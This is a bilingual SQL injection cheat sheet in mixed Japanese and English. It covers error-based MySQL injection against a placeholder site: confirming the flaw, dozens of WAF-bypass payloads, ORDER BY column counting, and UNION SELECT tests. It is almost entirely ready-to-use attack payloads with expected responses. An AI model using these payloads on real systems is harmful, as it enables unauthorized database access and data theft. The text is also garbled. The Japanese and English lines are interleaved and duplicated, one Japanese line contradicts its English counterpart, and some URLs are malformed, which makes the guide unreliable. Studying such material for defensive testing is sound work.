
あらゆる種類のSQLインジェクションに対応する高度なクエリを含むチートシート。
これはおそらくSQLインジェクション攻撃の中でも最も簡単な脆弱性です。攻撃者はSQLエラーメッセージを利用して、MySQLデータベースを列挙およびダンプすることができます。
http://domain.com/index.php?id=1Website loads successfully
http://domain.com/index.php?id=1'
エラーメッセージが表示されます:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near...``````http://domain.com/index.php?id=1\'
Error message shows up: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near...
http://domain.com/index.php?id=1 and 0' order by 1--+
ウェブサイトが正常に読み込まれますhttp://domain.com/index.php?id=2-1
Website loads successfully
http://domain.com/index.php?id=-1'
エラーメッセージが再び表示されるhttp://domain.com/index.php?id=-1)'
Error message shows up again
http://domain.com/index.php?id=1'-- -
ウェブサイトは正常に読み込まれるかもしれませんが、エラーも表示される可能性があります。http://domain.com/index.php?id=1'--
Website might loads successfuly, but it might shows error also
http://domain.com/index.php?id=1+--+
ウェブサイトは正常に読み込まれるかもしれませんが、エラーも表示される可能性があります
場合によっては、WAFがウェブサイトにエラーを発生させることを許可しないため、WAFをバイパスするために特別なクエリを送信する必要があるかもしれません。http://domain.com/index.php?id=1'--/**/-
If no WAF Warning is shown and website loads up, we confirm the vulnerability, else try the following payloads.
http//domain.com/index.php?id=/^.*1'--+-.*$/
http//domain.com/index.php?id=/*!500001'--+-*/
http//domain.com/index.php?id=1'--/**/-
http//domain.com/index.php?id=1'--/*--*/-
http//domain.com/index.php?id=1'--/*&a=*/-
http//domain.com/index.php?id=1'--/*1337*/-
http//domain.com/index.php?id=1'--/**_**/-
http//domain.com/index.php?id=1'--%0A-
http//domain.com/index.php?id=1'--%0b-
http//domain.com/index.php?id=1'--%0d%0A-
http//domain.com/index.php?id=1'--%23%0A-
http//domain.com/index.php?id=1'--%23foo%0D%0A-
http//domain.com/index.php?id=1'--%23foo*%2F*bar%0D%0A-
http//domain.com/index.php?id=1'--#qa%0A#%0A-
http//domain.com/index.php?id=/*!20000%0d%0a1'--+-*/
http//domain.com/index.php?id=/*!blobblobblob%0d%0a1'--+-*/
Now that we performed an SQL syntax error to the website, we can begin fuzzing and finding how many columns do we have by using ORDER BY
http://domain.com/index.php?id=1' order by 1-- -
このクエリはエラーを表示してはなりません。1 より小さい数は存在しないためです
ペイロードにエラーが表示される場合は、負の値を設定してみてください:http://domain.com/index.php?id=-1' order by 1-- -
This query musn't shows up error, since there is no lower number than 1
If the payload shows up error, try removing the quote which might cause SQL error:
http://domain.com/index.php?id=605 order by 1-- -
http://domain.com/index.php?id=-605 order by 1-- -
These both queries musn't shows up error. If error is still ocurring, try the following payloads:
http://domain.com/index.php?id=1' order by 1 desc-- -
http://domain.com/index.php?id=1' group by 1-- -
http://domain.com/index.php?id=1' group by 1-- -
http://domain.com/index.php?id=1' /**/ORDER/**/BY/**/ 1-- -
http://domain.com/index.php?id=-1' /*!order*/+/*!by*/ 1-- -
http://domain.com/index.php?id=1' /*!ORDER BY*/ 1-- -
http://domain.com/index.php?id=1'/*!50000ORDER*//**//*!50000BY*/ 1-- -
http://domain.com/index.php?id=1' /*!12345ORDER*/+/*!BY*/ 1-- -
http://domain.com/index.php?id=1' /*!50000ORDER BY*/ 1-- -
http://domain.com/index.php?id=1' order/**_**/by 1-- -
http://domain.com/index.php?id=1\ order by 1-- -
http://domain.com/index.php?id=1' order by 1 asc-- -
http://domain.com/index.php?id=1' group by 1 asc-- -
http://domain.com/index.php?id=1' AND 0 order by 1-- -
http://domain.com/index.php?id=1%0Aorder%0Aby%0A1-- -
http://domain.com/index.php?id=1%23%0Aorder%23%0Aby%23%0A1-- -
http://domain.com/index.php?id=1%23aa%0Aorder%23aa%0Aby%23aa%0A1-- -
http://domain.com/index.php?id=1%23xyz%0Aorder%23xyz%0Aby%23xyz%0A1-- -
http://domain.com/index.php?id=1%23foo%0D%0Aorder%23foo%0D%0Aby%23foo%0D%0A1-- -
http://domain.com/index.php?id=1%23foo*%2F*bar%0D%0Aorder%23foo*%2F*bar%0D%0Aby%23foo*%2F*bar%0D%0A1-- -
http://domain.com/index.php?id=1/*!20000%0d%0a+order+by+*/1-- -
http://domain.com/index.php?id=1/*!blobblobblob%0d%0a+order+by+*/1-- -
http://domain.com/index.php?id=1/*!f****U%0d%0a+order+by+*/1-- -```
- If none of the payloads didn't bypass WAF, try again the payloads by following the 2 rules below:
- Add a minus (-) before 1 (example: ```?id=-1' /**/ORDER/**/BY/**/ 1-- -```)
- Remove the quote (') after the parameter value (example: ```?id=1 /**/ORDER/**/BY/**/ 1-- -```)
In this case, the payload ```?id=1 order by 1-- -``` worked and website loads successfuly. Now it is time to find the correct number of columns. Now let's use the payload that worked, and try increasing the number by 1, untill an error shows up:
```http://domain.com/index.php?id=1 order by 1-- -``` no error
```http://domain.com/index.php?id=1 order by 2-- -``` no error
```http://domain.com/index.php?id=1 order by 3-- -``` no error
```http://domain.com/index.php?id=1 order by 4-- -``` no error
```http://domain.com/index.php?id=1 order by 5-- -``` error:
```Unknown column '5' in 'order clause'Unknown column '5' in 'order clause'```
This means there are only 4 columns. Now we have to find which one of these 4 columns have information.
## Find the vulnerable column where information are stored using 'UNION SELECT' query
Using a simple query, we determine which of the 4 columns reflect our input using. Only 1 of these payloads will run without **syntax error**. *NOTE: If none worked, try the same payloads, but remove the quote (') after number 1.*
```http://domain.com/index.php?id=1' Union Select 1,2,3,4-- -```
```http://domain.com/index.php?id=-1 Union Select 1,2,3,4-- -```
```http://domain.com/index.php?id=-1' Union Select 1,2,3,4-- -```
```http://domain.com/index.php?id=1'+UNION+ALL+SELECT+null,null,null,null--+-```
```http://domain.com/index.php?id=1' Union Select null,2,3,4-- -```
```http://domain.com/index.php?id=1' Union Select 1,null,3,4-- -```
```http://domain.com/index.php?id=1' Union Select 1,2,null,4-- -```
```http://domain.com/index.php?id=1' Union Select 1,2,3,null-- -```
```http://domain.com/index.php?id=.1' Union Select 1,2,3,4-- -```
```http://domain.com/index.php?id=-1' div 0' Union Select 1,2,3,4-- -```
```http://domain.com/index.php?id=1' Union Select 1,2,3,4 desc-- -```
```http://domain.com/index.php?id=1' AND 0 Union Select 1,2,3,4-- -```
Website must successfully load and we will see a number (in our case between 1-4)
